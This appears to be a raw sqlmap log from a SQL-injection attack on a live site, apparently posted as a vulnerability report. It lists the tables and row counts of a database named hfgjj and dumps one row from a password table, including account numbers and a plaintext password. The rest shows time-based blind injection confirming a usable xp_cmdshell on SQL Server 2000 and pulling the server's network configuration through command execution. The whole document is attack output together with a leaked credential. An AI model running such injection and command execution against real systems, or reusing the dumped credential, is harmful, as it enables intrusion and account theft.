| v_168_dz1            |
| v_168_dz2            |
| v_168_dz_old_61      |
| v_168_dz_old_61      |
| v_168_dz_old_61      |
| v_168_dz_old_65      |
| v_168_dz_old_66      |
| v_168_dz_old_67      |
| v_168_dz_old_68      |
| v_168_dz_old_yl      |
| v_168_gjd            |
| v_168_info_old       |
| v_168_info_old       |
| v_dw_gjmx_old        |
| v_dw_gjmx_old        |
| v_dw_gzmx            |
| v_dwhjqk_old         |
| v_dwhjqk_old         |
| v_dwzz_old           |
| v_house_info         |
| v_save_etps_password |
| v_save_password      |
| v_update_Time        |
| v_web_hdmx           |
| v_web_hdqk1          |
| v_web_hdqk1          |
| v_web_sdqk           |
| v_web_shgc           |
| v_web_wtmx09         |
| v_web_wtmx10         |
| v_web_wtmx11         |
| v_web_wtmx12         |
| v_web_wttqmx_old     |
| v_web_wttqmx_old     |
| v_web_wttqmx_old     |
| web_dwinfo           |
| wenjian              |
| xzsp_dw              |
| xzsp_dw              |
| xzxk                 |
| zhut                 |
| zxbs                 |
| ??                   |
+----------------------+
Database: hfgjj
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| dbo.v_168_dz1            | 7603650 |
| dbo.v_web_hdmx           | 6436608 |
| dbo.v_dw_gjmx_old        | 1220549 |
| dbo.v_dw_gjmx_old        | 1220549 |
| dbo.v_web_wttqmx_old     | 1071690 |
| dbo.v_web_wttqmx_old     | 1071690 |
| dbo.v_web_wttqmx_old     | 1071690 |
| dbo.v_save_password      | 895507  |
| dbo.v_web_shgc           | 497282  |
| dbo.v_168_dwhjqk_old     | 441669  |
| dbo.v_168_dwhjqk_old     | 441669  |
| dbo.v_dwhjqk_old         | 438713  |
| dbo.v_dwhjqk_old         | 438713  |
| dbo.v_168_dz_old_yl      | 424834  |
| dbo.v_168_info_old       | 374905  |
| dbo.v_168_info_old       | 374905  |
| dbo.v_web_wtmx12         | 238842  |
| dbo.v_168_dwzz_old       | 165814  |
| dbo.v_168_dwzz_old       | 165814  |
| dbo.v_168_dz2            | 147125  |
| dbo.v_web_wtmx10         | 120510  |
| dbo.v_web_wtmx11         | 89190   |
| dbo.v_dw_gzmx            | 76545   |
| dbo.v_dwzz_old           | 76088   |
| dbo.v_09_10_xh           | 59814   |
| dbo.v_web_wtmx09         | 34592   |
| dbo.v_web_hdqk1          | 29389   |
| dbo.v_web_hdqk1          | 29389   |
| dbo.sys_log              | 24920   |
| dbo.hdzx                 | 11659   |
| dbo.v_168_dwinfo         | 10587   |
| dbo.v_house_info         | 9579    |
| dbo.v_save_etps_password | 7666    |
| dbo.v_web_sdqk           | 4741    |
| dbo.tongji               | 4323    |
| dbo.web_dwinfo           | 3387    |
| dbo.v_168_dwdz           | 1043    |
| dbo.cms_hdjl             | 464     |
| dbo.SYS_SITERIGHT        | 360     |
| dbo.WELFARE_NEWS         | 257     |
| dbo.sys_role_resource    | 192     |
| dbo.sys_role_resource    | 192     |
| dbo.fagui                | 102     |
| dbo.wenjian              | 74      |
| dbo.supply_note          | 69      |
| dbo.sys_resource         | 60      |
| dbo.sys_user_role        | 47      |
| dbo.sys_user_role        | 47      |
| dbo.xzsp_dw              | 39      |
| dbo.xzsp_dw              | 39      |
| dbo.SYS_MENU             | 38      |
| dbo.mail_material        | 34      |
| dbo.supply_replynote     | 34      |
| dbo.sysconstraints       | 34      |
| dbo.focus_user           | 30      |
| dbo.pbcatcol             | 29      |
| dbo.kill_kk              | 21      |
| dbo.pbcatedt             | 21      |
| dbo.DIY_TEMPTALBLE       | 20      |
| dbo.pbcatfmt             | 20      |
| dbo.CULTURE_INVESTDETAIL | 13      |
| dbo.D99_CMD              | 12      |
| dbo.hero_table           | 12      |
| dbo.sys_user_unit        | 8       |
| dbo.h_quyu               | 7       |
| dbo.advise_upload        | 6       |
| dbo.xzxk                 | 6       |
| dbo.v_168_gjd            | 5       |
| dbo.INNER_INFO           | 4       |
| dbo.renyuan_dw           | 4       |
| dbo.renyuan_dw           | 4       |
| dbo.class_supply         | 3       |
| dbo.sqlmapoutput         | 3       |
| dbo.sys_unittype         | 3       |
| dbo.syssegments          | 3       |
| dbo.zxbs                 | 3       |
| dbo.CULTURE_INVESTED     | 2       |
| dbo.D99_Tmp              | 2       |
| dbo.fellow_class         | 2       |
| dbo.fellow_link          | 2       |
| dbo.h_loupan             | 2       |
| dbo.pbcattbl             | 2       |
| dbo.tz_js                | 2       |
| dbo.tz_note              | 2       |
| dbo.D99_REG              | 1       |
| dbo.h_loudong            | 1       |
| dbo.LIFA_NEWS            | 1       |
| dbo.sys_siteprevilige    | 1       |
| dbo.sys_siteprevilige    | 1       |
| dbo.v_update_Time        | 1       |
+--------------------------+---------+
Database: hfgjj
Table: v_save_password
[1 entry]
+-------------+------+--------------------+-------+-----------+-----------+-----
----+---------+----------+
| sjhm        | dxjs | ftime              | allIn | dwyhzh    | zgyhzh    | toda
yIn | enabled | password |
+-------------+------+--------------------+-------+-----------+-----------+-----
----+---------+----------+
| null        | 0    | 12 31 2014 12:58PM | 99    | 888880003 | 800978023 | 9
    | NULL    | s082812  |
+-------------+------+--------------------+-------+-----------+-----------+-----
----+---------+----------+
存在系统交互shell
 payload content(s)
[01:21:19] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2000
[01:21:19] [INFO] retrieving the length of query output
[01:21:19] [INFO] retrieved:
[01:21:19] [INFO] retrieved:
[01:21:21] [INFO] fingerprinting the back-end DBMS operating system version and
service pack
[01:21:21] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
[01:21:21] [INFO] the back-end DBMS operating system is Windows 2000 Service Pac
k 0
[01:21:22] [INFO] testing if current user is DBA
[01:21:22] [INFO] checking if xp_cmdshell extended procedure is available, pleas
e wait..
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[01:21:32] [INFO] xp_cmdshell extended procedure is available
[01:21:33] [INFO] testing if xp_cmdshell extended procedure is usable
[01:21:33] [INFO] retrieving the length of query output
[01:21:35] [INFO] retrieving the length of query output
[01:21:37] [INFO] xp_cmdshell extended procedure is usable
do you want to retrieve the command standard output? [Y/n/a] y
[01:21:39] [INFO] retrieved: 14
[01:21:40] [INFO] retrieving the length of query output
[01:21:40] [INFO] retrieved: 1
[01:21:40] [INFO] retrieved:
[01:21:42] [INFO] retrieving the length of query output
[01:21:42] [INFO] retrieved: 30
[01:22:02] [INFO] retrieved: Windo_s____0 _P Configura_____ 19/30 (63%)
[01:22:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:22:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:22:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:22:02] [WARNING] if the problem persists please try to lower the number of u
sed threads (option '--threads')
[01:22:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:22:07] [INFO] retrieved: Windo_s __00 _P Configuration  26/30 (87%)
[01:22:07] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:22:09] [INFO] retrieved: Windows 2000 IP Configuration
[01:22:09] [INFO] retrieving the length of query output
[01:22:09] [INFO] retrieved: 1
[01:22:10] [INFO] retrieved:
[01:22:12] [INFO] retrieving the length of query output
[01:22:12] [INFO] retrieved: 23
[01:22:31] [INFO] retrieved: Ethern____dapter ____:  15/23 (65%)
[01:22:32] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:22:32] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:22:32] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:22:32] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:22:37] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://**.**.**.**/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[01:22:47] [INFO] retrieved: Ethernet adapter ????:
[01:22:47] [INFO] retrieving the length of query output
[01:22:47] [INFO] retrieved: 1
[01:22:48] [INFO] retrieved:
[01:22:50] [INFO] retrieving the length of query output
[01:22:50] [INFO] retrieved: 56
[01:23:09] [INFO] retrieved: _Medi____ate . . . ___ . _ _______ 18/56 (32%)
[01:23:10] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:23:10] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:23:10] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:23:10] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:23:10] [INFO] retrieved: _Medi____ate . . . _ _ . _ _______ 19/56 (34%)
[01:23:11] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:23:22] [INFO] retrieved: .._S_ate . . . _ _ . . . . _ . : .. 32/56 (57%)
[01:23:22] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:23:23] [INFO] retrieved: .._ate . . . _ _ . . . . . . : _a.. 34/56 (61%)
[01:23:24] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:23:28] [INFO] retrieved: .. . . . . . . . . . : _able_D___.. 41/56 (73%)
[01:23:30] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:23:30] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:23:41] [INFO] retrieved: ... . . . . . : _able Dis_onnected  54/56 (96%)
[01:23:42] [CRITICAL] connection dropped or unknown HTTP status code received. T
ry to force the HTTP User-Agent header with option '--user-agent' or switch '--r
andom-agent'. sqlmap is going to retry the request
[01:23:43] [INFO] retrieved: ... . . . . . : Cable Dis_onnected  55/56 (98%)
[01:23:45] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:23:46] [INFO] retrieved:  Media State . . . . . . . . . . . : Cable Disconne
cted
[01:23:46] [INFO] retrieving the length of query output
[01:23:46] [INFO] retrieved:
[01:23:47] [INFO] retrieved:
[01:23:48] [INFO] retrieving the length of query output
[01:23:48] [INFO] retrieved: 25
[01:24:06] [INFO] retrieved: Ethe_ne___dapt_r_________ 11/25 (44%)
[01:24:08] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:24:08] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:24:08] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:24:09] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:24:16] [INFO] retrieved: Etherne__adapt_r ?___ ___ 16/25 (64%)
[01:24:16] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:24:25] [INFO] retrieved: Ethernet adapter ???? 2:
[01:24:25] [INFO] retrieving the length of query output
[01:24:25] [INFO] retrieved: 1
[01:24:26] [INFO] retrieved:
[01:24:27] [INFO] retrieving the length of query output
[01:24:27] [INFO] retrieved: 36
[01:24:47] [INFO] retrieved:  _on_ec___n-spec_fic _NS_S________ 18/36 (50%)
[01:24:48] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:24:48] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:24:48] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:25:03] [INFO] retrieved: ..nnection-spec_fic DNS_Suffix  . : 34/36 (94%)
[01:25:04] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:25:05] [INFO] retrieved: ..nnection-spec_fic DNS Suffix  . : 35/36 (97%)
[01:25:07] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:25:08] [INFO] retrieved:  Connection-specific DNS Suffix  . :
[01:25:08] [INFO] retrieving the length of query output
[01:25:08] [INFO] retrieved: 51
[01:25:28] [INFO] retrieved:  I___d_res_._. . . ._. ._.________ 18/51 (35%)
[01:25:28] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:25:29] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:25:29] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:25:30] [INFO] retrieved:  I___d_res_._. . . ._. . ._.______ 20/51 (39%)
[01:25:30] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:25:40] [INFO] retrieved: ..d_res_. . . . ._. . . . __._. :.. 32/51 (63%)
[01:25:41] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:25:41] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:25:53] [INFO] retrieved: .. . . . . . . ._. : 192.16_.0.249  48/51 (94%)
[01:25:53] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:25:55] [INFO] retrieved: .. . . . . . . . . : **.**.**.**  50/51 (98%)
[01:26:00] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:26:01] [INFO] retrieved:  IP Address. . . . . . . . . . . . : **.**.**.**
[01:26:01] [INFO] retrieving the length of query output
[01:26:01] [INFO] retrieved: 51
[01:26:21] [INFO] retrieved: _Su_ne_ Mask . _ . .__ ___________ 17/51 (33%)
[01:26:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:26:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:26:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:26:28] [INFO] retrieved:  Su_ne_ Mask . _ . . _ ._. ___ .__ 24/51 (47%)
[01:26:28] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:26:41] [INFO] retrieved: .. . . . . . ._. ._. . . :_255_2_.. 39/51 (76%)
[01:26:41] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:26:42] [INFO] retrieved: ... . . . ._. ._. . . :_255_2_5._.. 40/51 (78%)
[01:26:42] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:26:45] [INFO] retrieved: .. . . ._. . . . . :_255_2_5.__5.0  45/51 (88%)
[01:26:47] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:26:48] [INFO] retrieved: .. . . . . . . . . :_255_2_5.255.0  48/51 (94%)
[01:26:49] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:26:52] [INFO] retrieved: .. . . . . . . . . : 255_255.255.0  50/51 (98%)
[01:26:52] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:26:54] [INFO] retrieved:  Subnet Mask . . . . . . . . . . . : **.**.**.**
[01:26:54] [INFO] retrieving the length of query output
[01:26:54] [INFO] retrieved: 51
[01:27:18] [INFO] retrieved:  Default ____way . . . __._. _____ 22/51 (43%)
[01:27:18] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:27:20] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:27:21] [INFO] retrieved:  Default _a__way . . . __._. _ ___ 24/51 (47%)
[01:27:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:27:32] [INFO] retrieved: .. Gateway . . . __. . . . .__ __.. 35/51 (69%)
[01:27:33] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:27:38] [INFO] retrieved: .. . . . __. . . . . _ _92.168.0_.. 43/51 (84%)
[01:27:39] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:27:42] [INFO] retrieved: .. . . . . . . . . _ _92.168.0_254  48/51 (94%)
[01:27:43] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:27:44] [INFO] retrieved: .. . . . . . . . . : _**.**.**.**  50/51 (98%)
[01:27:48] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:27:50] [INFO] retrieved:  Default Gateway . . . . . . . . . : 1**.**.**.**
[01:27:50] [INFO] retrieving the length of query output
[01:27:51] [INFO] retrieved:
[01:27:52] [INFO] retrieved:
command standard output:
---
Windows 2000 IP Configuration
Ethernet adapter ????:
        Media State . . . . . . . . . . . : Cable Disconnected
Ethernet adapter ???? 2:
        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : **.**.**.**
        Subnet Mask . . . . . . . . . . . : **.**.**.**
        Default Gateway . . . . . . . . . : 1**.**.**.**